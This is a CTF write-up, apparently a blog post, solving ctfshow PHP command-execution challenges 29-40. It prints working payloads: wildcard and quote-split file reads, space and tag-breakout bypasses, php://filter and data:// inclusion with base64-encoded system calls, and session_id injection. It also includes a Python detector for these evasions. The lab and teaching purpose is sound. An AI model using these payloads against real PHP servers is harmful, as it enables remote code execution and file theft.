CTFSHOW WEB entry: command execution notes (continuously updated)

The school team assessment was beaten and shut down and rebuilt

29-36

29

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
  • The challenge filters flag (case-insensitive)
  • My own payload
echo `nl ????.???`; # show the file contents with line numbers
echo `tail ????.???`; # show only the last few lines of the file
echo `cat ????.???`; # show the file contents starting from the first line
echo `more ????.???`; # show the file contents one page at a time
echo `less ????.???`; # similar to more, but better: it can page backwards!
echo `head ????.???`; # show only the first few lines of the file
echo `tac ????.???`; # show the file starting from the last line
echo `nl fla''g.php`;
echo `nl f*`;
  • Payloads from other people
c=eval($_GET[1])?>&1=system('cat flag.php');
c=?><?=echo `$_GET[1]`;&1=cat flag.php // view the source

To sum up:

  1. The wildcards * and ? are not filtered: * matches zero or more arbitrary characters, and ? matches exactly one character.
  2. nl, tail, cat, more, less, tac and head: seven commands that can read a file.
  3. If only the complete strings flag and cat are filtered, they can be bypassed by splitting them with empty quotes ('').
  4. Calling the system function returns the function's return value (for example 0 means correct execution, -1 means an execution error); at the same time the result of the command is printed to the console.
  5. Backticks return the command's execution result directly, but it is not displayed on the screen.
  6. I had thought of nesting eval to construct a one-line webshell, but I had not thought of nesting eval tcl
  7. ?><?= is a magical thing; set up an environment and see it for yourself:
<?php
?>
<?='aaaaaaa'?>
  • Visiting the page will show aaaaaaa

<?= is PHP's short open tag, a shortcut for echo().
To use this short tag you must enable it in the settings in the php.ini file: find the following line in php.ini and set it to On.

30

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
  • The challenge filters the strings shown above
  • system is newly filtered; flag and php can still be bypassed with the method above
  • Payload:
echo `nl fl''ag.p''hp`;

31

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
  • The main difference from the previous challenge is that . and the space character are now filtered as well.
  • My own payload
echo`nl%09f*`;
?><?=`nl%09f*`;
?><?=`$_GET[1]`;&1=cat flag.php
eval($_GET[1])?>&1=system('cat flag.php');
eval($_GET[1]);&1=system('cat flag.php');
  • Tips:

1. Compared with the previous challenges, the test point is the filtering of spaces.
2. Bypasses for the space: %09, ${IFS}, $IFS$9, <>, <

32

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
  • Compared with the previous challenge a few more symbols are filtered: echo, `, ;, (
  • Construct the payload:
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
  • Originally I would have replaced ?> with ;, which should work because eval must be given a complete PHP statement, but since ; is filtered only ?> can be used.
  • A file inclusion and a pseudo-protocol are used here to obtain the flag: the eval is turned into a file inclusion vulnerability, and a new trick is learned.

33-36

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
  • I'm a little bit puzzled by the filtering of "
  • payload:
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
  • This payload can be used to get the flag up to challenge 36

37-44

37

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
  • There is a file inclusion here, and the file inclusion vulnerability should be used to execute the command
  • At first I wanted to use the php://input pseudo-protocol to achieve command execution, but it failed. It turned out that there was a problem with my hackbar.
  • payload:
?c=php://input (POST body sent with hackbar: <?php system('cat f*');?>)
?c=data://text/plain,<?php system('cat f*');?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==

The include (or require) statement takes all the text/code/markup in the specified file and copies it into the file that uses the include statement.
The data://text/plain pseudo-protocol lets the user control the input stream; when it is combined with include, the data:// stream supplied by the user is treated as a PHP file and executed.
php://input in the pseudo-protocol family works on the same principle.

38

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}

  • payload:

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==

39

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
}else{
    highlight_file(__FILE__);
}
  • flag is filtered here, and the suffix .php is appended when the file is included.
  • payload:
c=data://text/plain,<?php system('cat f*');?>
  • Tip: data://text/plain,<?php ...?> is equivalent to executing a PHP statement. Because the PHP block has already been closed, the appended .php is treated as an HTML page and simply displayed on the page, which has no effect.
  • I don't quite understand why php://input fails
  • To be filled in later
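The defensive lesson of challenges 29-32 and 37-39 is that the blacklists match the raw request string, so fl''ag, %09, ${IFS}, ?><?= and php:// slip past them. As an added example (my own code, not from the original post or from ctfshow), here is a small Python detector that normalises a query string first and only then applies rules for the evasion families shown on this page; the rule names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus


def normalize(query: str) -> str:
    """Undo the evasions used in challenges 29-39 so that the rules see what
    PHP or the shell will actually execute rather than the raw request."""
    s = unquote_plus(query)                            # %09 -> tab, %20 -> space
    s = re.sub(r"''|\"\"", "", s)                      # fl''ag -> flag (29/30)
    s = re.sub(r"\$\{IFS\}|\$IFS(?:\$\d)?", " ", s)    # ${IFS}, $IFS$9 -> space (31)
    s = re.sub(r"<>|(?<=\w)<(?=\w)", " ", s)           # cat<>f*, cat<f* -> cat f* (31)
    return re.sub(r"\s+", " ", s)                      # tabs and runs -> one space


# Rule names are constructed; each targets one evasion family from the page.
RULES = {
    "keyword": re.compile(r"\b(?:flag|system|eval|passthru|shell_exec|exec)\b", re.I),
    "wildcard_read": re.compile(r"\b(?:nl|cat|tac|head|tail|more|less)\s+\S*[*?]", re.I),
    "tag_breakout": re.compile(r"\?>|<\?(?:=|php\b)", re.I),   # ?><?= and <?php
    "stream_wrapper": re.compile(r"\b(?:php|data)://", re.I),   # php://filter, data://
    "backtick_exec": re.compile(r"`[^`]+`"),
}


def analyze(query: str) -> list:
    """Return the names of every rule that fires on the normalised query."""
    s = normalize(query)
    return [name for name, rx in RULES.items() if rx.search(s)]


# Constructed requests mirroring the page's payloads, plus one benign control.
SAMPLE_REQUESTS = [
    "c=echo `nl fla''g.php`;",
    "c=echo`nl%09f*`;",
    "c=?><?=`$_GET[1]`;&1=cat${IFS}flag.php",
    "c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php",
    "c=data://text/plain,<?php system('cat f*');?>",
    "page=about&lang=en",
]

if __name__ == "__main__":
    for q in SAMPLE_REQUESTS:
        print(f"{', '.join(analyze(q)) or 'clean':<50} {q}")
```

Without the normalize() step the first three requests match no keyword at all, which is exactly the gap the challenge filters have.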

40

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
  • A bunch of things are filtered, including single quotes, $ and `
  • No idea; I read the writeup
  • payload
c=session_start();system(session_id());
  • Capture the request and set PHPSESSID=ls; this achieves command execution
  • Equivalent to system('ls');

Then change it directly to c=session_start();highlight_file(session_id()); and set the value of PHPSESSID to flag.php, and there is a problem.
After testing, it turns out that whether this works depends on the PHP version: in 5.5-7.1.9 it can be executed. session_id is restricted to the characters 0-9, a-z, A-Z and -, so below 5.5 and above 7.1 other content cannot be written, while characters that meet the requirement still work.
Reprinted from Feather Big Brother

  • Write the payload first: highlight_file(next(array_reverse(scandir(pos(localeconv())))));
  • Functions that need to be used:
  • localeconv(): returns an array containing locale numeric and currency formatting information; the first element of the array is a dot (.)
  • pos(): returns the value of the current element of an array
  • array_reverse(): reverses an array
  • scandir(): lists the files in a directory
  • next(): advances the array's internal pointer to the next element and returns it
  • First obtain the dot through pos(localeconv()); since scandir('.') lists the files in the current directory,
  • scandir(pos(localeconv())) can obtain flag.php (scandir sorts ascending, so after array_reverse flag.php comes right after index.php and next() returns it, assuming the directory holds only those two files)
  • Reprinted from Feather

Origin blog.csdn.net/CyhDl666/article/details/115126571